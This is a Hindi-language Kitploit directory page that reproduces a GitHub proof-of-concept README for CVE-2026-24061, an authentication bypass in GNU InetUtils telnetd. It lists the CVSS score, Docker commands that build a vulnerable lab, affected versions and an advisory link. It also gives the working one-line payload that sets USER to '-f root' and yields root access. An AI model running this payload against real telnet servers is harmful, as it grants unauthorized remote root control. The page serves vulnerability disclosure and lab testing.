Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/lucaspdiniz/cve-2026-24061
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणरिमोट एक्सेस टूल
GitHublucaspdiniz/cve-2026-24061

CVE-2026-24061

GNU InetUtils telnetd में कमजोरी दूरस्थ रूट एक्सेस सक्षम करती है

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GNU InetUtils telnetd प्रमाणीकरण बायपास आर्गुमेंट इंजेक्शन के माध्यम से - CVE-2026-24061 📚

परिचय

GNU InetUtils telnetd में हाल ही में पहचानी गई एक आर्गुमेंट इंजेक्शन भेद्यता हमलावरों को USER पर्यावरण चर को "-f root" मान पर सेट करके प्रमाणीकरण को दरकिनार करने की अनुमति देती है। परिणामस्वरूप, एक दूरस्थ अनप्रमाणित हमलावर कमजोर telnetd सेवा चलाने वाले सिस्टम तक पहुंच प्राप्त कर सकता है और root तक विशेषाधिकार बढ़ा सकता है। यदि सफलतापूर्वक शोषण किया जाता है, तो यह दोष हमलावरों को संवेदनशील जानकारी तक पहुंचने, सिस्टम सेटिंग्स बदलने और मनमाने कमांड चलाने में सक्षम बना सकता है, जिसके परिणामस्वरूप पूर्ण सिस्टम समझौता हो सकता है।

CVSS विवरणCNA (MITRE)
आधार स्कोर9.8
वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
हमला वेक्टरनेटवर्क
हमला जटिलताकम
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
दायराअपरिवर्तित
गोपनीयता प्रभावउच्च
अखंडता प्रभावउच्च
उपलब्धता प्रभावउच्च
CVSSv3 संस्करण3.1

क्या हुआ?

हम 2015 के नीचे दिए गए कमिट तक पहुंचने में सक्षम थे, जो कोड परिवर्तन (पंक्ति 62) दिखाता है जिसने यह भेद्यता पैदा की।

इस readme का उद्देश्य केवल शोषण के निष्पादन को दिखाना है, हर उस चरण को नहीं जिसने यह CVE उत्पन्न किया, हालांकि, इरादा %U प्लेसहोल्डर को USER पर्यावरण चर से लिए गए मान से बदलना है। यह विशेष पर्यावरण चर उपयोगकर्ता-नियंत्रित है और Telnet प्रोटोकॉल के माध्यम से हेरफेर किया जा सकता है 🔥।

पर्यावरण 🔓

इस परीक्षण के लिए, मैंने Docker Hub से छवियों का उपयोग करके 2 कंटेनर बनाए, जिनमें InetUtils का एक कमजोर संस्करण था।

  • कंटेनर -> https://hub.docker.com/_/ubuntu
root@kitploit:~
docker run --rm -it --name vuln -p 23:23 ubuntu:22.04 bash
      apt update
      apt install build-essential wget tar
      wget http://ftp.gnu.org/gnu/inetutils/inetutils-2.5.tar.gz
      tar -xvzf inetutils-2.5.tar.gz
      cd inetutils-2.5
      ./configure
      ./configure --enable-telnet
      make clean
      make
      make install
      export PATH=$PATH:/usr/local/libexec
      apt install openbsd-inetd
      echo "telnet  stream  tcp  nowait  root  /usr/local/libexec/telnetd  telnetd" >> /etc/inetd.conf
      service openbsd-inetd restart

docker run --rm -it --name attacker ubuntu bash
      apt install telnet

पेलोड 💀

नीचे दिए गए पेलोड के साथ, हम USER चर को बदलते हैं और प्रमाणीकरण प्रणाली को बायपास करते हैं।

root@kitploit:~
USER="-f root" telnet -a 172.17.0.3

प्रभावित संस्करण ✅

  • GNU InetUtils 2.7 तक का Telnetd दूरस्थ प्रमाणीकरण की अनुमति देता है।
  • Ubuntu संस्करण के अपडेट का पालन करें। -> https://ubuntu.com/security/CVE-2026-24061

अपना inetutils संस्करण जांचें

root@kitploit:~
hostname --version
telnetd --version


अगली बार मिलते हैं :wink:

टूल डाउनलोड करें